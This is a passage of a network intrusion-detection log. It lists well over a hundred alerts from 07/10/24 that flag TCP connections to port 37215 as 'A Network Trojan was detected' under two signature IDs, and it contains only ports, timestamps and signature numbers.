                  Source Port:57914
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.565464
                  SID:2835222
                  Source Port:47568
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.356991
                  SID:2835222
                  Source Port:57514
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.648548
                  SID:2835222
                  Source Port:50650
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.468333
                  SID:2835222
                  Source Port:40340
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.809850
                  SID:2829579
                  Source Port:50866
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.667183
                  SID:2829579
                  Source Port:59936
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.251100
                  SID:2835222
                  Source Port:42496
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.851578
                  SID:2835222
                  Source Port:56214
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.849497
                  SID:2835222
                  Source Port:38494
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.075999
                  SID:2835222
                  Source Port:59746
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.219455
                  SID:2829579
                  Source Port:56734
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.223907
                  SID:2829579
                  Source Port:47544
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.814365
                  SID:2835222
                  Source Port:45744
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.848073
                  SID:2835222
                  Source Port:50788
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.213994
                  SID:2829579
                  Source Port:45800
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.847677
                  SID:2829579
                  Source Port:49340
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.381447
                  SID:2835222
                  Source Port:42066
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.294251
                  SID:2835222
                  Source Port:57254
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.245548
                  SID:2829579
                  Source Port:44002
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.887848
                  SID:2835222
                  Source Port:41476
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.881343
                  SID:2835222
                  Source Port:54596
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.417770
                  SID:2829579
                  Source Port:57442
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.993743
                  SID:2835222
                  Source Port:53902
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.459051
                  SID:2829579
                  Source Port:44808
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.879703
                  SID:2829579
                  Source Port:60908
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:34.124417
                  SID:2835222
                  Source Port:43980
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.881228
                  SID:2835222
                  Source Port:51042
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.158539
                  SID:2835222
                  Source Port:34950
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.828074
                  SID:2829579
                  Source Port:57354
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.093550
                  SID:2829579
                  Source Port:49300
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.853108
                  SID:2829579
                  Source Port:49304
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.800330
                  SID:2829579
                  Source Port:59868
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.406451
                  SID:2835222
                  Source Port:46360
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.550771
                  SID:2829579
                  Source Port:33180
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.113907
                  SID:2829579
                  Source Port:43786
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.901338
                  SID:2829579
                  Source Port:45550
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.865761
                  SID:2835222
                  Source Port:58986
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.867590
                  SID:2829579
                  Source Port:60554
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.083690
                  SID:2835222
                  Source Port:54220
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.683298
                  SID:2835222
                  Source Port:46742
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.996521
                  SID:2829579
                  Source Port:53252
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.548037
                  SID:2835222
                  Source Port:49520
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.179313
                  SID:2835222
                  Source Port:45490
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.469991
                  SID:2829579
                  Source Port:37668
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.196006
                  SID:2835222
                  Source Port:54958
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.830488
                  SID:2835222
                  Source Port:59910
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.381629
                  SID:2835222
                  Source Port:47184
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.825232
                  SID:2835222
                  Source Port:53006
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.883458
                  SID:2829579
                  Source Port:53228
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.045134
                  SID:2835222
                  Source Port:60196
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.744457
                  SID:2835222
                  Source Port:38046
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.002573
                  SID:2835222
                  Source Port:40106
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.599801
                  SID:2835222
                  Source Port:35960
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.887223
                  SID:2835222
                  Source Port:40724
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.808876
                  SID:2829579
                  Source Port:40702
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.207005
                  SID:2829579
                  Source Port:58606
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.299402
                  SID:2835222
                  Source Port:55090
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.759020
                  SID:2829579
                  Source Port:34692
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.833150
                  SID:2829579
                  Source Port:33324
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.415648
                  SID:2835222
                  Source Port:55258
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.008729
                  SID:2835222
                  Source Port:42062
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.011354
                  SID:2829579
                  Source Port:60442
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.268554
                  SID:2829579
                  Source Port:44928
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.314793
                  SID:2835222
                  Source Port:56248
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.022999
                  SID:2829579
                  Source Port:36386
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.490874
                  SID:2829579
                  Source Port:41018
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.681536
                  SID:2835222
                  Source Port:52490
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.839204
                  SID:2835222
                  Source Port:53386
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.771249
                  SID:2829579
                  Source Port:33380
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.821569
                  SID:2835222
                  Source Port:44734
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.175812
                  SID:2829579
                  Source Port:58924
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.227018
                  SID:2829579
                  Source Port:41890
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.586951
                  SID:2829579
                  Source Port:38802
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.461308
                  SID:2829579
                  Source Port:41580
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.407237
                  SID:2829579
                  Source Port:48576
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.721021
                  SID:2835222
                  Source Port:54436
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.783603
                  SID:2835222
                  Source Port:57854
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.568062
                  SID:2835222
                  Source Port:34966
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.851941
                  SID:2835222
                  Source Port:42976
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.257964
                  SID:2835222
                  Source Port:55770
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.002361
                  SID:2829579
                  Source Port:55136
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.141329
                  SID:2829579
                  Source Port:50090
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.198368
                  SID:2829579
                  Source Port:48596
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.560795
                  SID:2835222
                  Source Port:55420
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.861773
                  SID:2829579
                  Source Port:53006
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.546125
                  SID:2835222
                  Source Port:35444
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.910333
                  SID:2835222
                  Source Port:41834
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.766968
                  SID:2829579
                  Source Port:55458
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.248893
                  SID:2835222
                  Source Port:52052
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.281691
                  SID:2835222
                  Source Port:55686
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.037758
                  SID:2835222
                  Source Port:48166
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.858364
                  SID:2835222
                  Source Port:45812
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.761850
                  SID:2829579
                  Source Port:52008
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.525598
                  SID:2835222
                  Source Port:42464
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.903981
                  SID:2829579
                  Source Port:47390
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.570409
                  SID:2835222
                  Source Port:55936
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.747131
                  SID:2829579
                  Source Port:51712
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.651021
                  SID:2835222
                  Source Port:43062
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.356986
                  SID:2829579
                  Source Port:41980
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.795318
                  SID:2829579
                  Source Port:34412
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.598573
                  SID:2829579
                  Source Port:37678
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.831646
                  SID:2835222
                  Source Port:51648
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.015024
                  SID:2835222
                  Source Port:47210
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.260584
                  SID:2829579
                  Source Port:49380
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.213907
                  SID:2835222
                  Source Port:36880
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.375796
                  SID:2835222
                  Source Port:47448
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.546205
                  SID:2829579
                  Source Port:42442
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.632992
                  SID:2835222
                  Source Port:53766
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.896247
                  SID:2829579
                  Source Port:34446
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.851731
                  SID:2829579
                  Source Port:43098
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.239188
                  SID:2829579
                  Source Port:57326
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.633588
                  SID:2829579
                  Source Port:59774
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.297213
                  SID:2835222
                  Source Port:53150
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.640182
                  SID:2829579
                  Source Port:52924
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.029476
                  SID:2829579
                  Source Port:57756
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.196369
                  SID:2829579
                  Source Port:47196
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.992041
                  SID:2829579
                  Source Port:35124
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.635784
                  SID:2829579
                  Source Port:37628
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.521887
                  SID:2829579
                  Source Port:55514
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.792492
                  SID:2829579
                  Source Port:59876
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.872230
                  SID:2835222
                  Source Port:39794
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.196325
                  SID:2829579
                  Source Port:37448
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.281765
                  SID:2829579
                  Source Port:46114
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.392725
                  SID:2829579
                  Source Port:57202
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.819309
                  SID:2829579
                  Source Port:35178
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.664170
                  SID:2835222
                  Source Port:41830
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.614287
                  SID:2835222
                  Source Port:59136
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.789703
                  SID:2835222
                  Source Port:36690
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.761249
                  SID:2829579
                  Source Port:52472
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.358828
                  SID:2835222
                  Source Port:55780
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.928888
                  SID:2829579
                  Source Port:41600
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.130427
                  SID:2829579
                  Source Port:54722
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.098508
                  SID:2835222
                  Source Port:49856
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.566054
                  SID:2829579
                  Source Port:52822
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.018095
                  SID:2835222
                  Source Port:54774
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.419623
                  SID:2829579
                  Source Port:36632
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.915722
                  SID:2829579
                  Source Port:58288
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.779389
                  SID:2829579
                  Source Port:51526
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.969551
                  SID:2829579
                  Source Port:57306
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.332212
                  SID:2835222
                  Source Port:40946
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.711172
                  SID:2829579
                  Source Port:41648
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.535361
                  SID:2829579
                  Source Port:45826
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.679549
                  SID:2835222
                  Source Port:60284
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.568589
                  SID:2835222
                  Source Port:37532
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.535302
                  SID:2829579
                  Source Port:58174
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.236089
                  SID:2835222
                  Source Port:33886
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.565170
                  SID:2829579
                  Source Port:38248
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.247062
                  SID:2829579
                  Source Port:49344
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.510241
                  SID:2829579
                  Source Port:38046
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.819224
                  SID:2835222
                  Source Port:37908
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.603648
                  SID:2835222
                  Source Port:46498
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.764510
                  SID:2835222
                  Source Port:58530
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.423552
                  SID:2835222
                  Source Port:50312
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.728995
                  SID:2829579
                  Source Port:58766
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.844780
                  SID:2835222
                  Source Port:47750
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.176056
                  SID:2829579
                  Source Port:56112
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.278006
                  SID:2835222
                  Source Port:49724
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.897517
                  SID:2829579
                  Source Port:39378
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.784417
                  SID:2835222
                  Source Port:37564
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.831201
                  SID:2829579
                  Source Port:37640
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.926953
                  SID:2835222
                  Source Port:45686
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.098304
                  SID:2829579
                  Source Port:57730
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.983854
                  SID:2835222
                  Source Port:34480
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.321754
                  SID:2835222
                  Source Port:53092
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.285291
                  SID:2829579
                  Source Port:56234
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.081032
                  SID:2835222
                  Source Port:33382
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.474716
                  SID:2835222
                  Source Port:60434
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.565861
                  SID:2829579
                  Source Port:40130
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.318563
                  SID:2835222
                  Source Port:51624
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.716345
                  SID:2835222
                  Source Port:33190
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.177651
                  SID:2829579
                  Source Port:55706
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.376738
                  SID:2835222
                  Source Port:45114
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.828645
                  SID:2829579
                  Source Port:58904
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.864679
                  SID:2835222
                  Source Port:37062
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.623254
                  SID:2829579
                  Source Port:34566
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.896003
                  SID:2829579
                  Source Port:43944
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.157314
                  SID:2835222
                  Source Port:40194
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.639847
                  SID:2835222
                  Source Port:48782
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.265553
                  SID:2829579
                  Source Port:48644
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.623619
                  SID:2829579
                  Source Port:60212
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.096599
                  SID:2829579
                  Source Port:57538
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.667282
                  SID:2829579
                  Source Port:46962
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.722958
